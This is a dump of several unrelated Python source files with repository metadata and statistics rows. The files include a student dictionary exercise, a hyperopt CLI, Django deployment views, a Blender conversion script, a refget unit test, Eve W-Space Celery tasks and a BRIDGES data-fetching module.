GetDIBits.argtypes = [HDC, HBITMAP, UINT, UINT, LPVOID, POINTER(BITMAPINFO), UINT]
GetDIBits.restype = c_int
SelectObject = windll.Gdi32.SelectObject
SelectObject.argtypes = [HDC, HGDIOBJ]
SelectObject.restype = HGDIOBJ
| 24.843137 | 119 | 0.741121 | 280 | 2,534 | 6.596429 | 0.360714 | 0.030319 | 0.013535 | 0.021657 | 0.030861 | 0.024905 | 0 | 0 | 0 | 0 | 0 | 0.018653 | 0.132597 | 2,534 | 101 | 120 | 25.089109 | 0.821656 | 0.003552 | 0 | 0.05 | 0 | 0.0125 | 0.125248 | 0 | 0 | 0 | 0.007927 | 0 | 0 | 1 | 0 | false | 0 | 0.075 | 0 | 0.175 | 0.0125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1400e05a81e61584f76a1b7de9750c733259c909 | 1,081 | py | Python | S1/TP7/ex5.py | HerbeMalveillante/ecole | bebbc73cd678c58c9cd40389ea1cf229a0200308 | [
"MIT"
] | null | null | null | S1/TP7/ex5.py | HerbeMalveillante/ecole | bebbc73cd678c58c9cd40389ea1cf229a0200308 | [
"MIT"
] | null | null | null | S1/TP7/ex5.py | HerbeMalveillante/ecole | bebbc73cd678c58c9cd40389ea1cf229a0200308 | [
"MIT"
] | null | null | null | dico = {25: 4, 8: 1, 12: 2, 3: 5}
print(dico)
print("5 dans dico ?", 5 in dico)
print("25 dans dico ?", 25 in dico)
dico[9] = 1
dico[8] = 2
print(dico)
del dico[25]
print(dico)
print("-" * 10)
inventaire = {"orange": 378, "pomme": 545, "banane": 422, "poire": 269}
def checkStock():
fruit = input("Entrez un fruit : ")
print(
f"Il y a {inventaire[fruit]} {fruit}s."
if fruit in inventaire
else "Desolé, le fruit n'est pas en stock"
)
checkStock()
def ajouteStock():
fruit, stock = input(
"Entrez un fruit et son stock séparés par un espace : "
).split()
stock = int(stock)
if fruit in inventaire and stock != inventaire[fruit]:
print(
"Erreur : le fruit est déjà présent dans l'inventaire avec un stock différent"
)
return
inventaire[fruit] = stock
def supprimerStock():
fruit = input("Entrez un fruit : ")
if fruit not in inventaire:
print("Le fruit n'est pas dans l'inventaire")
return
del inventaire[fruit]
ajouteStock()
supprimerStock()
| 21.196078 | 90 | 0.603145 | 151 | 1,081 | 4.317881 | 0.410596 | 0.092025 | 0.059816 | 0.082822 | 0.113497 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04557 | 0.269195 | 1,081 | 50 | 91 | 21.62 | 0.779747 | 0 | 0 | 0.236842 | 0 | 0 | 0.297872 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.078947 | false | 0 | 0 | 0 | 0.131579 | 0.236842 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
14026ffd736cbe43208ce8862e478324d4c76ffc | 2,176 | py | Python | rampwf/hyperopt/cli/hyperopt.py | albertcthomas/ramp-workflow | aee62742314f95ebcb3f226e535ff4ad64e88024 | [
"BSD-3-Clause"
] | 1 | 2020-12-03T12:22:22.000Z | 2020-12-03T12:22:22.000Z | rampwf/hyperopt/cli/hyperopt.py | martin1tab/ramp-workflow | aee62742314f95ebcb3f226e535ff4ad64e88024 | [
"BSD-3-Clause"
] | null | null | null | rampwf/hyperopt/cli/hyperopt.py | martin1tab/ramp-workflow | aee62742314f95ebcb3f226e535ff4ad64e88024 | [
"BSD-3-Clause"
] | null | null | null | import click
from ..hyperopt import run_hyperopt
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.command(context_settings=CONTEXT_SETTINGS)
@click.option('--submission', default='starting_kit', show_default=True,
help='The kit to hyperopt. It should be located in the '
'"submissions" folder of the starting kit.')
@click.option('--ramp-kit-dir', default='.', show_default=True,
help='Root directory of the ramp-kit to hyperopt.')
@click.option('--ramp-data-dir', default='.', show_default=True,
help='Directory containing the data. This directory should '
'contain a "data" folder.')
@click.option('--ramp-submission-dir', default='submissions',
show_default=True,
help='Directory where the submissions are stored. It is the '
'directory (typically called "submissions" in the ramp-kit) '
'that contains the individual submission subdirectories.')
@click.option('--engine', default='random', show_default=True,
help='The name of the hyperopt engine, e.g., "random".')
@click.option('--n-iter', default=10, show_default=True,
help='The number of hyperopt iterations, inputted to the '
'engine. The granularity is per cv fold, so if you want to '
'fully test 7 hyperparameter combinations for example with the '
'random engine and you have 8 CV folds, you should enter '
'--n-iter 56')
@click.option('--save-best', is_flag=True, default=True,
show_default=True,
help='Specify this flag to create a <submission>_hyperopt '
'in the "submissions" dir with the best submission.')
def main(submission, ramp_kit_dir, ramp_data_dir, ramp_submission_dir,
engine, n_iter, save_best):
"""Hyperopt a submission."""
run_hyperopt(
ramp_kit_dir=ramp_kit_dir, ramp_data_dir=ramp_data_dir,
ramp_submission_dir=ramp_submission_dir, submission=submission,
engine_name=engine, n_iter=n_iter, save_best=save_best)
def start():
main()
if __name__ == '__main__':
start()
| 44.408163 | 78 | 0.654871 | 280 | 2,176 | 4.910714 | 0.317857 | 0.064 | 0.076364 | 0.096727 | 0.180364 | 0.105455 | 0.063273 | 0 | 0 | 0 | 0 | 0.003578 | 0.22932 | 2,176 | 48 | 79 | 45.333333 | 0.816339 | 0.01011 | 0 | 0.051282 | 0 | 0 | 0.419926 | 0.019553 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.051282 | 0 | 0.102564 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
14027a2ddc57fcac5fad84f5b3665608869fa996 | 3,675 | py | Python | deployments/views.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | 2 | 2015-01-05T21:09:24.000Z | 2015-07-31T16:52:38.000Z | deployments/views.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | null | null | null | deployments/views.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | null | null | null | from django.http import HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response, get_object_or_404
from django.core.context_processors import csrf
from django.core.urlresolvers import reverse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.conf import settings
from common import _slugit
from projects.models import Project
from deployments.models import CloudProvider, Deployment
from deployments.forms import AssociateDeploymentForm
TEMPLATE_PATH = 'deployments/'
def _createParams(req):
p = {'breadcrumbs': [{reverse('deployments'): 'Deployments'}],
'is_deployments': True, 'nav_projects': Project.objects.filter( \
owner=req.user).exclude(production_url__exact='')}
p.update(csrf(req))
p['deployments'] = Deployment.objects.filter(owner=req.user)
return p
@login_required
def home(req):
p = _createParams(req)
return render_to_response(TEMPLATE_PATH + 'home.html', p,
context_instance=RequestContext(req))
@login_required
def deployment(req, slug=''):
if req.method == 'GET':
p = _createParams(req)
deployment = get_object_or_404(Deployment, slug=slug)
p['form'] = AssociateDeploymentForm(instance=deployment)
p['slug'] = deployment.slug
return render_to_response(TEMPLATE_PATH + 'associate.html', p,
context_instance=RequestContext(req))
elif req.method == 'POST':
deployment = get_object_or_404(Deployment, slug=slug)
# check user permissions
if deployment.owner == req.user:
form = AssociateDeploymentForm(req.POST)
if form.is_valid():
_save_associate_deployment(form, deployment)
messages.add_message(req, messages.INFO,
'Deployment "%s" successfully updated.' % deployment.name)
return HttpResponseRedirect(reverse('deployments'))
else:
return render_to_response(TEMPLATE_PATH + 'associate.html',
p, context_instance=RequestContext(req))
else:
messages.add_message(req, messages.INFO,
'You must be the owner of a deployment to edit it.')
return HttpResponseRedirect(reverse('deployments'))
@login_required
def associate_deployment(req):
p = _createParams(req)
if req.method == 'GET':
p['form'] = AssociateDeploymentForm()
return render_to_response(TEMPLATE_PATH + 'associate.html', p,
context_instance=RequestContext(req))
elif req.method == 'POST':
form = AssociateDeploymentForm(req.POST)
if form.is_valid():
d = Deployment()
d.owner = req.user
_save_associate_deployment(form, d)
messages.add_message(req, messages.INFO,
'%s successfully associated with %s.' % (d.project,
d.provider))
return HttpResponseRedirect(reverse('deployments'))
else:
p['form'] = form
return render_to_response(TEMPLATE_PATH + 'associate.html', p,
context_instance=RequestContext(req))
def _save_associate_deployment(form, d):
d.name = form.cleaned_data['name']
d.slug = _slugit(Deployment, d.name)
d.provider = form.cleaned_data['provider']
d.project = form.cleaned_data['project']
d.username = form.cleaned_data['username']
d.ip_address = form.cleaned_data['ip_address']
d.ssh_port = form.cleaned_data['ssh_port']
d.save()
| 37.5 | 78 | 0.668027 | 411 | 3,675 | 5.793187 | 0.245742 | 0.037799 | 0.040319 | 0.046199 | 0.392272 | 0.294834 | 0.223436 | 0.223436 | 0.148677 | 0.148677 | 0 | 0.003185 | 0.23102 | 3,675 | 97 | 79 | 37.886598 | 0.839349 | 0.005986 | 0 | 0.395062 | 0 | 0 | 0.103014 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061728 | false | 0 | 0.160494 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1406030bc96045cc5ac86ac183e1b7807a173011 | 1,802 | py | Python | blend2bam/blender_script_common.py | Clockwork-Muse/blend2bam | 6680bc815b2c6dd1359949b7bcbe52a55de7301b | [
"MIT"
] | 41 | 2019-11-14T07:42:37.000Z | 2022-02-21T13:22:02.000Z | blend2bam/blender_script_common.py | Clockwork-Muse/blend2bam | 6680bc815b2c6dd1359949b7bcbe52a55de7301b | [
"MIT"
] | 58 | 2019-04-22T14:53:04.000Z | 2022-03-15T10:04:36.000Z | blend2bam/blender_script_common.py | Clockwork-Muse/blend2bam | 6680bc815b2c6dd1359949b7bcbe52a55de7301b | [
"MIT"
] | 17 | 2019-08-24T13:59:01.000Z | 2022-02-16T15:47:18.000Z | import json
import os
import sys
import bpy #pylint: disable=import-error
def convert_files(convertfn, outputext):
args = sys.argv[sys.argv.index('--')+1:]
#print(args)
settings_fname, srcroot, dstdir, blendfiles = args[0], args[1], args[2], args[3:]
if not srcroot.endswith(os.sep):
srcroot += os.sep
if not dstdir.endswith(os.sep):
dstdir += os.sep
print('srcroot:', srcroot)
print('Exporting:', blendfiles)
print('Export to:', dstdir)
with open(settings_fname) as settings_file:
settings = json.load(settings_file)
try:
for blendfile in blendfiles:
src = blendfile
dst = src.replace(srcroot, dstdir).replace('.blend', '.'+outputext)
bpy.ops.wm.open_mainfile(filepath=src)
convertfn(settings, src, dst)
except: #pylint: disable=bare-except
import traceback
traceback.print_exc(file=sys.stderr)
print('Failed to convert {} to {}'.format(src, outputext), file=sys.stderr)
sys.exit(1)
def in_blender_28():
version = bpy.app.version
return version[0] >= 2 and version[1] >= 80
def make_particles_real():
try:
bpy.ops.object.mode_set(mode='OBJECT')
except RuntimeError:
pass
for obj in bpy.data.objects[:]:
if hasattr(obj, 'particle_systems') and obj.particle_systems:
print('Making particles on {} real'.format(obj.name))
try:
if in_blender_28():
obj.select_set(True)
else:
obj.select = True
bpy.ops.object.duplicates_make_real()
except RuntimeError as error:
print('Failed to make particles real on {}: {}'.format(obj.name, error), file=sys.stderr)
| 29.064516 | 105 | 0.602109 | 223 | 1,802 | 4.780269 | 0.38565 | 0.018762 | 0.036585 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011477 | 0.274695 | 1,802 | 61 | 106 | 29.540984 | 0.804132 | 0.036626 | 0 | 0.065217 | 0 | 0 | 0.087132 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0.021739 | 0.108696 | 0 | 0.195652 | 0.152174 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1407baf11e4f8bf8634e13cfdd86fac65a4deec4 | 989 | py | Python | test/test_unit/test_ga4gh/test_refget/test_routes/test_sequence/test_get_service_info.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | null | null | null | test/test_unit/test_ga4gh/test_refget/test_routes/test_sequence/test_get_service_info.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | 3 | 2021-04-30T21:12:42.000Z | 2021-06-02T02:11:45.000Z | test/test_unit/test_ga4gh/test_refget/test_routes/test_sequence/test_get_service_info.py | ga4gh/refget-cloud | c39a65acba9818414789f004cced487562012bf0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Unit tests for get_service_info method"""
import json
import pytest
from ga4gh.refget.config.service_info import SERVICE_INFO
from ga4gh.refget.http.status_codes import StatusCodes as SC
from ga4gh.refget.routes.sequence.get_service_info import get_service_info
from test.common.methods import setup_properties_request_response
props_dict = {}
testdata = [
({}, SC.OK, json.dumps({"service": SERVICE_INFO})),
(
{"header": {"Accept": "text/strange-encoding"}},
SC.NOT_ACCEPTABLE,
json.dumps({"message": "requested media type(s) not supported"})
)
]
@pytest.mark.parametrize("request_dict,exp_sc,exp_body", testdata)
def test_get_service_info(request_dict, exp_sc, exp_body):
properties, request, response = setup_properties_request_response(
props_dict, request_dict)
get_service_info(properties, request, response)
assert response.get_status_code() == exp_sc
assert response.get_body() == exp_body
| 34.103448 | 74 | 0.73913 | 132 | 989 | 5.265152 | 0.431818 | 0.126619 | 0.100719 | 0.086331 | 0.178417 | 0.178417 | 0 | 0 | 0 | 0 | 0 | 0.004728 | 0.144591 | 989 | 28 | 75 | 35.321429 | 0.816785 | 0.061678 | 0 | 0 | 0 | 0 | 0.121475 | 0.053145 | 0 | 0 | 0 | 0 | 0.090909 | 1 | 0.045455 | false | 0 | 0.272727 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140a827ee20450927c1a2ee95317625a892e4780 | 4,215 | py | Python | evewspace/Map/tasks.py | darkorb/eve-wspace | 687f3aeb6cd0a446a74108b2a5c03cb21c464497 | [
"Apache-2.0"
] | null | null | null | evewspace/Map/tasks.py | darkorb/eve-wspace | 687f3aeb6cd0a446a74108b2a5c03cb21c464497 | [
"Apache-2.0"
] | null | null | null | evewspace/Map/tasks.py | darkorb/eve-wspace | 687f3aeb6cd0a446a74108b2a5c03cb21c464497 | [
"Apache-2.0"
] | null | null | null | # Eve W-Space
# Copyright 2014 Andrew Austin and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime, timedelta
from celery import task
from Map.models import System, KSystem, Signature
from core.models import Faction
import eveapi
from API import cache_handler as handler
from django.core.cache import cache
import pytz
@task()
def update_system_stats():
"""
Updates the System Statistics (jumps, kills) from the API.
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
jumpapi = api.map.Jumps()
killapi = api.map.Kills()
System.objects.all().update(shipkills=0, podkills=0, npckills=0)
KSystem.objects.all().update(jumps=0)
# Update jumps from Jumps API for K-space systems
for entry in jumpapi.solarSystems:
try:
KSystem.objects.filter(pk=entry.solarSystemID).update(
jumps=entry.shipJumps)
except Exception:
pass
# Update kills from Kills API
for entry in killapi.solarSystems:
try:
System.objects.filter(pk=entry.solarSystemID).update(
shipkills=entry.shipKills,
podkills=entry.podKills,
npckills=entry.factionKills
)
except Exception:
pass
@task()
def update_system_sov():
"""
Updates the Sov for K-Space systems. If any exceptions are raised
(e.g. Alliance record doesn't exist), sov is just marked "None."
"""
api = eveapi.EVEAPIConnection(cacheHandler=handler)
sovapi = api.map.Sovereignty()
alliance_list = api.eve.AllianceList().alliances
lookup_table = {}
for alliance in alliance_list:
lookup_table[alliance.allianceID] = alliance.name
KSystem.objects.all().update(sov="None")
for sys in sovapi.solarSystems:
try:
if sys.factionID:
KSystem.objects.filter(pk=sys.solarSystemID).update(
sov=Faction.objects.get(pk=sys.factionID).name)
elif sys.allianceID:
if sys.allianceID in lookup_table:
KSystem.objects.filter(pk=sys.solarSystemID).update(
sov=lookup_table[sys.allianceID])
except Exception:
pass
@task()
def fill_jumps_cache():
"""
Ensures that the jumps cache is filled.
"""
if not cache.get('route_graph'):
from Map.utils import RouteFinder
rf = RouteFinder()
# Initializing RouteFinder should be sufficient to cache the graph
# If it doesn't for some reason, we explicitly cache it
if not cache.get('route_graph'):
rf._cache_graph()
@task()
def check_server_status():
"""
Checks the server status, if it detects the server is down,
set updated=False on all signatures. This is deprecated as of Hyperion and
is maintained to prevent older configuration files from breaking on upgrade.
"""
return None
@task()
def downtime_site_update():
"""
This task should be run during the scheduled EVE downtime.
It triggers the increment_downtime function on all singatures
that have been activated.
"""
for sig in Signature.objects.all():
if sig.downtimes or sig.downtimes == 0:
sig.increment_downtime()
@task()
def clear_stale_records():
"""
This task will clear any user location records older than 15 minutes.
"""
limit = datetime.now(pytz.utc) - timedelta(minutes=15)
Signature.objects.filter(owned_time__isnull=False,
owned_time__lt=limit).update(owned_time=None,
owned_by=None)
| 33.188976 | 80 | 0.655753 | 528 | 4,215 | 5.172348 | 0.397727 | 0.02197 | 0.02197 | 0.024167 | 0.131088 | 0.079824 | 0.03442 | 0.03442 | 0 | 0 | 0 | 0.005461 | 0.261447 | 4,215 | 126 | 81 | 33.452381 | 0.871828 | 0.345433 | 0 | 0.295775 | 0 | 0 | 0.009882 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084507 | false | 0.042254 | 0.126761 | 0 | 0.225352 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
140b00a4e0df52e767311698ec7c06d3fcf99b25 | 23,000 | py | Python | bridges/data_src_dependent/data_source.py | acbart/bridges-python | 5a18d2eb68df7cdff996120c0461b238ca599481 | [
"MIT"
] | null | null | null | bridges/data_src_dependent/data_source.py | acbart/bridges-python | 5a18d2eb68df7cdff996120c0461b238ca599481 | [
"MIT"
] | null | null | null | bridges/data_src_dependent/data_source.py | acbart/bridges-python | 5a18d2eb68df7cdff996120c0461b238ca599481 | [
"MIT"
] | null | null | null | import json
import requests
import pickle
from bridges.data_src_dependent import earthquake_usgs
from bridges.data_src_dependent import actor_movie_imdb
from bridges.data_src_dependent import game
from bridges.data_src_dependent import shakespeare
from bridges.data_src_dependent import gutenberg_book
from bridges.data_src_dependent import cancer_incidence
from bridges.data_src_dependent import song
from bridges.data_src_dependent import lru_cache
from bridges.data_src_dependent import movie_actor_wiki_data
from bridges.data_src_dependent.osm import *
from bridges.data_src_dependent.elevation import *
from bridges.data_src_dependent.actor_movie_imdb import *
from bridges.color_grid import ColorGrid
from bridges.color import Color
from SPARQLWrapper import SPARQLWrapper, JSON
##
#
# Get meta data of the IGN games collection.
#
# This function retrieves and formats the data into a list of
# Game objects
#
# @throws Exception if the request fails
#
# @return a list of Game objects,
#
#
def get_game_data():
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/games"
PARAMS = {"Accept: application/json"}
r = requests.get(url=url, params=str(PARAMS))
r = r.json()
D = r["data"]
# print(D)
for i in range(len(D)):
V = D[i]
G = V["genre"]
genre = []
for j in range(len(G)):
genre.append(str(G[j]))
wrapper.append(game.Game(V["game"], V["platform"], V["rating"], str(genre)))
return wrapper
def parse_actor_movie_imdb(item):
am_pair = ActorMovieIMDB()
am_pair.actor = item["actor"]
am_pair.movie = item["movie"]
return am_pair
##
# Get ActorMovie IMDB Data
# retrieved, formatted into a list of ActorMovieIMDB objects
#
# @param number the number of actor/movie pairs, but currently unused,
# returns all records.
# @throws Exception if the request fails
#
# @return a list of ActorMovieIMDB objects, but only actor and
# movie fields in this version
#
def get_actor_movie_imdb_data(number = 0):
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/imdb?limit=" + str(number)
PARAMS = {"Accept: application/json"}
r = requests.get(url=url, params=str(PARAMS))
# print(r.status_code, r.reason)
data = r.json()
D = data["data"]
for i in range(len(D)):
V = D[i]
wrapper.append(actor_movie_imdb.ActorMovieIMDB(V["actor"], V["movie"]))
return wrapper
def get_actor_movie_imdb_data2():
url = "https://bridgesdata.herokuapp.com/api/imdb2"
r = requests.get(url = url)
status = r.status_code
data = r.json()
D = data["data"]
am_list = []
if status == 200:
for i in range(len(D)):
V = D[i]
am_pair = parse_actor_movie_imdb(V)
am_pair.rating = int(V['rating'])
genre = V['genres']
v = []
for k in range(len(genre)):
v.append(genre[k])
am_pair._genres = v
am_list.append(am_pair)
return am_list
else:
r.raise_for_status()
##
# Get USGS earthquake data
# USGS Tweet data (https://earthquake.usgs.gov/earthquakes/map/)
# retrieved, formatted into a list of EarthquakeUSGS objects
#
# @param number the number of earthquake records retrieved,
# limited to 5000
# @throws Exception if the request fails
#
# @return a list of earthquake records
#
def get_earthquake_usgs_data(number = 0):
wrapper = []
url = "http://earthquakes-uncc.herokuapp.com/eq"
latest_url = "http://earthquakes-uncc.herokuapp.com/eq/latest/" + str(number)
PARAMS = {"Accept: application/json"}
if number <= 0:
r = requests.get(url=url, params=str(PARAMS))
r = r.json()
for i in range(len(r)):
V = r[i]["properties"]
G = r[i]["geometry"]["coordinates"]
wrapper.append(earthquake_usgs.EarthquakeUSGS(V["mag"], G[0], G[1], V["place"], V["title"], V["url"], V["time"]))
else:
r = requests.get(url=latest_url, params=str(PARAMS))
data = r.json()
D = data["Earthquakes"]
for i in range(len(D)):
V = D[i]["properties"]
G = D[i]["geometry"]["coordinates"]
wrapper.append(earthquake_usgs.EarthquakeUSGS(V["mag"], G[0], G[1], V["place"], V["title"], V["url"], V["time"]))
return wrapper
##
#
# Get data of Shakespeare works (plays, poems)
#
# This function retrieves and formats the data into a
# a list of Shakespeare objects.
#
# Valid endpoints: 'poems','plays', <title>
# Valid queryParams: format{simple}
#
# @throws Exception if the request fails
#
# @param endpoint can be either "plays" or "poems". If this is
# specified, then only these types of works are retrieved.
# @param textOnly if this is set, then only the text is retrieved.
#
# @return an array of Shakespeare objects
#
#
def get_shakespeare_data(endpoint = "", textonly = False):
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/shakespeare/"
PARAMS = {"Accept: application/json"}
if endpoint == "plays" or endpoint == "poems":
url += "/" + endpoint
if textonly:
url += "?format=simple"
r = requests.get(url = url, params = str(PARAMS))
r = r.json()
D = r["data"]
for i in range(len(D)):
V = D[i]
wrapper.append(shakespeare.Shakespeare(V["title"], V["type"], V["text"]))
return wrapper
##
#
# Get meta data of the Gutenberg book collection (1000 books)
# This function retrieves, and formats the data into a list of
# GutenbergBook objects
#
# @throws Exception if the request fails
#
# @return a list of GutenbergBook objects,
#
#
def get_gutenberg_book_data(num = 0):
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/books"
PARAMS = {"Accept: application/json"}
if num > 0:
url += "?limit=" + str(num)
r = requests.get(url=url, params = str(PARAMS))
r = r.json()
D = r["data"]
for i in range(len(D)):
V = D[i]
A = V["author"]
L = V["languages"]
lang = []
for j in range(len(L)):
lang.append(str(L[j]))
G = V["genres"]
genre = []
for j in range(len(G)):
genre.append(str(G[j]))
S = V["subjects"]
subject = []
for j in range(len(S)):
subject.append(str(S[j]))
M = V["metrics"]
wrapper.append(gutenberg_book.GutenbergBook(A["name"], A["birth"], A["death"], V["title"],
str(lang), str(genre), str(subject), M["characters"], M["words"],
M["sentences"], M["difficultWords"], V["url"], V["downloads"]))
return wrapper
##
# Retrieves the CDC dataset into a vector of records
# See CancerIncidence class for more information
#
#
def get_cancer_incident_data(num = 0):
wrapper = []
url = "https://bridgesdata.herokuapp.com/api/cancer/withlocations"
PARAMS = {"Accept: application/json"}
if num > 0:
url += "?limit="+str(num)
r = requests.get(url=url, params=str(PARAMS))
r = r.json()
D = r["data"]
# c = CancerIncidence.CancerIncidence()
for i in range(len(D)):
c = cancer_incidence.CancerIncidence()
v = D[i]
age = v["Age"]
c.set_age_adjusted_rate(age["Age Adjusted Rate"])
c.set_age_adjusted_ci_lower(age["Age Adjusted CI Lower"])
c.set_age_adjusted_ci_upper(age["Age Adjusted CI Upper"])
c.set_year(v["Year"])
data = v["Data"]
c.set_crude_rate(data["Crude Rate"])
c.set_crude_rate_ci_lower(data["Crude CI Lower"])
c.set_crude_rate_ci_upper(data["Crude CI Upper"])
c.set_race(data["Race"])
c.set_population(data["Population"])
c.set_event_type(data["Event Type"])
c.set_affected_area(v["Area"])
loc = v["loc"]
c.set_location_x(loc[0])
c.set_location_y(loc[1])
wrapper.append(c)
return wrapper
##
#
# Get data of a particular songs (including lyrics) using the Genius API
# (https://docs.genius.com/), given the song title and artist name.
# Valid endpoints: http://bridgesdata.herokuapp.com/api/songs/find/
# Valid queryParams: song title, artist name
#
# This function retrieves and formats the data into a
# Song object. The song if not cached in the local DB is queried
# and added to the DB
#
# @throws Exception if the request fails
#
# @return a Song object,
#
#
def get_song(songTitle, artistName = None):
wrapper = []
url = "http://bridgesdata.herokuapp.com/api/songs/find/"
PARAMS = {"Accept: application/json"}
if len(songTitle):
url = url + songTitle
if artistName is not None:
if len(artistName):
url += "?artistName=" + artistName
url.replace(" ", "%20")
r = requests.get(url = url, params = str(PARAMS))
if r.status_code is not 200:
raise ConnectionError("HTTP Request Failed. Error Code: " + r.status_code)
r = r.json()
if "artist" in r:
artist = r["artist"]
else:
artist = ""
if "song" in r:
songs = r["song"]
else:
songs = ""
if "album" in r:
album = r["album"]
else:
album = ""
if "lyrics" in r:
lyrics = r["lyrics"]
else:
lyrics = ""
if "release_date" in r:
release_date = r["release_date"]
else:
release_date = ""
return song.Song(artist, songs, album, lyrics, release_date)
##
#
# Get data of the songs (including lyrics) using the Genius API
# https://docs.genius.com/
# Valid endpoints: https://bridgesdata.herokuapp.com/api/songs/
#
# This function retrieves and formats the data into a list of
# Song objects. This version of the API retrieves all the cached
# songs in the local DB.
#
# @throws Exception if the request fails
#
# @return a list of Song objects,
#
#
def get_song_data():
all_songs = []
url = "http://bridgesdata.herokuapp.com/api/songs/"
params = {"Accept: application/json"}
r = requests.get(url=url, params=str(params))
r = r.json()
D = r["data"]
for i in range(len(D)):
v = D[i]
if "artist" in v:
artist = v["artist"]
else:
artist = ""
if "song" in v:
song = v["song"]
else:
song = ""
if "album" in v:
album = v["album"]
else:
album = ""
if "lyrics" in v:
lyrics = v["lyrics"]
else:
lyrics = ""
if "release_date" in v:
release_date = v["release_date"]
else:
release_date = ""
all_songs.append(song.Song(artist, song, album, lyrics, release_date))
return all_songs
def get_color_grid_from_assignment(server: str, user: str, assignment: int, subassignment: int = 0) -> ColorGrid:
"""
Reconstruct a ColorGrid from an existing ColorGrid on the bridges server
:param str server: internal server url of bridges object
:param str user: the name of the user who uploaded the assignment
:param int assignment: the ID of the assignment to get
:param int subassignment: the ID of the subassignment to get (default 0)
:return: ColorGrid: the ColorGrid stored in the bridges server
"""
response = get_assignment(server, user, assignment, subassignment)
try:
from types import SimpleNamespace as Namespace
except ImportError:
# Python 2.x fallback
from argparse import Namespace
assignment_object = json.loads(response, object_hook=lambda d: Namespace(**d))
try:
if assignment_object.assignment_type != "ColorGrid":
raise RuntimeError("Malformed ColorGrid JSON: not a ColorGrid")
data_list = assignment_object.data
if len(data_list) is not 1:
raise RuntimeError("Malformed JSON: data is malformed")
data = data_list[0]
try:
encoding = data.encoding
except AttributeError:
# Handle case for ColorGrid generated before encoding field was added
encoding = "RAW"
if encoding != "RLE" and encoding != "RAW":
raise RuntimeError("Malformed ColorGrid JSON: encoding not supported: " + encoding)
if len(data.dimensions) != 2:
raise RuntimeError("Malformed ColorGrid JSON: dimensions are malformed")
dim_x = int(data.dimensions[0])
dim_y = int(data.dimensions[1])
try:
node_string = str(data.nodes)
except (TypeError, ValueError):
raise RuntimeError("Malformed ColorGrid JSON: node is not a String")
import base64
decoded_bytes = bytearray(base64.b64decode(node_string))
decoded = [int(x) for x in decoded_bytes]
except AttributeError:
